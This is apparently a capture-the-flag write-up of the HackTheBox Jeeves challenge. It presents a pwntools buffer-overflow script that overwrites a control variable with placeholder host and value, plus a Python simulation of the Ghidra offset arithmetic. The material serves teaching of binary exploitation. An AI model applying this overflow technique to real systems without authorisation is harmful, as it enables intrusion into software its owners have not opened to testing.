We covered a scenario of a binary vulnerable to a buffer overflow. The binary has NX and PIE protections enabled, so we opened it in Ghidra and built the exploitation methodology around calculating the offsets of the input variable and of a second variable that controls entry into an if statement that prints the flag. The objective was to control the value of that variable and let the execution flow enter the if statement. This was part of the HackTheBox Jeeves challenge in the Intro to Binary Exploitation track.

Buffer Overflow Techniques Notes

Exploit code is below.


from pwn import *

# Connection details for the HTB instance; placeholders, replace with the assigned address and port.
HOST = "TARGET_IP"
PORT = 0
target = remote(HOST, PORT)

# 60 bytes of filler reach the control variable; the distance comes from the Ghidra stack layout.
padding = b"A" * 60

# The constant the if statement compares the variable against, as read from the Ghidra listing.
value = 0x0  # placeholder: substitute the constant recovered from the binary

# Pack the value as a little-endian 8-byte word and append it to the filler.
payload = padding + p64(value)
target.sendline(payload)

# Read the response up to the first "." to capture the printed flag.
print(target.recvuntil(b"."))
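As an added illustration that is not the walkthrough's own code, the script below shows how the filler length follows from Ghidra's local_<hex> stack names and models the unchecked copy so that the chosen value lands in the control variable; the offsets 0x44 and 0x8 and the comparison constant 0xdeadbeef are constructed for the example, not taken from the Jeeves binary.

```python
import struct

def padding_from_ghidra(buf_local, var_local):
    """Bytes between the start of the input buffer and the control variable.

    Ghidra names stack locals local_<hex>; a larger number means a lower
    address, so the buffer sits buf_local - var_local bytes before the variable.
    """
    if buf_local <= var_local:
        raise ValueError("buffer must lie below the control variable on the stack")
    return buf_local - var_local

def build_payload(padding, value):
    """Filler bytes followed by the target value packed as a little-endian 8-byte word."""
    if not 0 <= value < (1 << 64):
        raise ValueError("value does not fit a 64-bit variable")
    return b"A" * padding + struct.pack("<Q", value)

def line_safe(payload):
    """False if a newline would cut the input short when the binary reads
    with a line-oriented routine such as gets or fgets."""
    return b"\n" not in payload

def simulate_frame(buf_local, var_local, payload):
    """Model the stack region from the buffer up to the end of the control
    variable, copy the payload in without a bounds check (what an unchecked
    read does), and return the variable's resulting value."""
    frame = bytearray(buf_local)
    frame[:len(payload)] = payload  # unbounded copy: runs past the buffer
    var_off = buf_local - var_local
    return struct.unpack("<Q", frame[var_off:var_off + 8])[0]

if __name__ == "__main__":
    # Constructed layout: buffer at local_44, control variable at local_8.
    pad = padding_from_ghidra(0x44, 0x8)          # 60 bytes, as in the exploit above
    payload = build_payload(pad, 0xdeadbeef)      # constructed comparison constant
    print("padding:", pad, "line-safe:", line_safe(payload))
    print("control variable after overflow: %#x" % simulate_frame(0x44, 0x8, payload))
```

The simulation only demonstrates the offset arithmetic; on the real target the check in the if statement decides whether the flag is printed.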


Video Walkthrough

About the Author

Cybersecurity trainer, MS in Cybersecurity, with expertise in the healthcare and finance industries; penetration tester and compliance auditor.
